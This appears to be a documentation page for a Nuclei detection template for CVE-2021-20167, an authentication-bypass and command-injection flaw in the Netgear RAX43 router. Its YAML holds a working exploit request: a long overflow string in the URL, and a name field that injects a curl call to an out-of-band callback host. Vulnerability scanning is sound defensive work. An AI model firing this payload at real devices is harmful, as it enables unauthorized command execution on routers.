Skip to content
Nuclei Templates

Netgear RAX43 1.0.3.96 - Command Injection/Authentication Bypass Buffer Overrun

ID: CVE-2021-20167

Severity: high

Author: gy741

Tags: cve2021,cve,tenable,netgear,rce,router

Description

Section titled “Description”

Netgear RAX43 version 1.0.3.96 contains a command injection and authentication bypass vulnerability. The readycloud_control.cgi CGI application is vulnerable to command injection in the name parameter. Additionally, the URL parsing functionality in the cgi-bin endpoint of the router containers a buffer overrun issue that can redirection control flow of the application. Note: This vulnerability uses a combination of CVE-2021-20166 and CVE-2021-20167.

YAML Source

Section titled “YAML Source”
id: CVE-2021-20167


info:
  name: Netgear RAX43 1.0.3.96 - Command Injection/Authentication Bypass Buffer Overrun
  author: gy741
  severity: high
  description: 'Netgear RAX43 version 1.0.3.96 contains a command injection and authentication bypass vulnerability. The readycloud_control.cgi CGI application is vulnerable to command injection in the name parameter. Additionally, the URL parsing functionality in the cgi-bin endpoint of the router containers a buffer overrun issue that can redirection control flow of the application. Note: This vulnerability uses a combination of CVE-2021-20166 and CVE-2021-20167.'
  remediation: Upgrade to newer release of the RAX43 firmware.
  reference:
    - https://www.tenable.com/security/research/tra-2021-55
    - https://nvd.nist.gov/vuln/detail/CVE-2021-20166
    - https://nvd.nist.gov/vuln/detail/CVE-2021-20167
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8
    cve-id: CVE-2021-20167
    cwe-id: CWE-77
    epss-score: 0.94822
    epss-percentile: 0.99273
    cpe: cpe:2.3:o:netgear:rax43_firmware:1.0.3.96:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: netgear
    product: rax43_firmware
  tags: cve2021,cve,tenable,netgear,rce,router


http:
  - raw:
      - |
        POST /cgi-bin/readycloud_control.cgi?1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users HTTP/1.1
        Host: {{Hostname}}


        "name":"';$(curl {{interactsh-url}});'",
        "email":"[email protected]"


    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"


      - type: word
        part: interactsh_request
        words:
          - "User-Agent: curl"
# digest: 4b0a00483046022100824c779429b23d46bd572f21e46545de1c2810e73257182215f6dcd6cef63862022100c0a530fafb9730d90ffc0e8d500a3e3b8b2f0efee97427809bc42f2fbfb08877:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-20167.yaml"

View on Github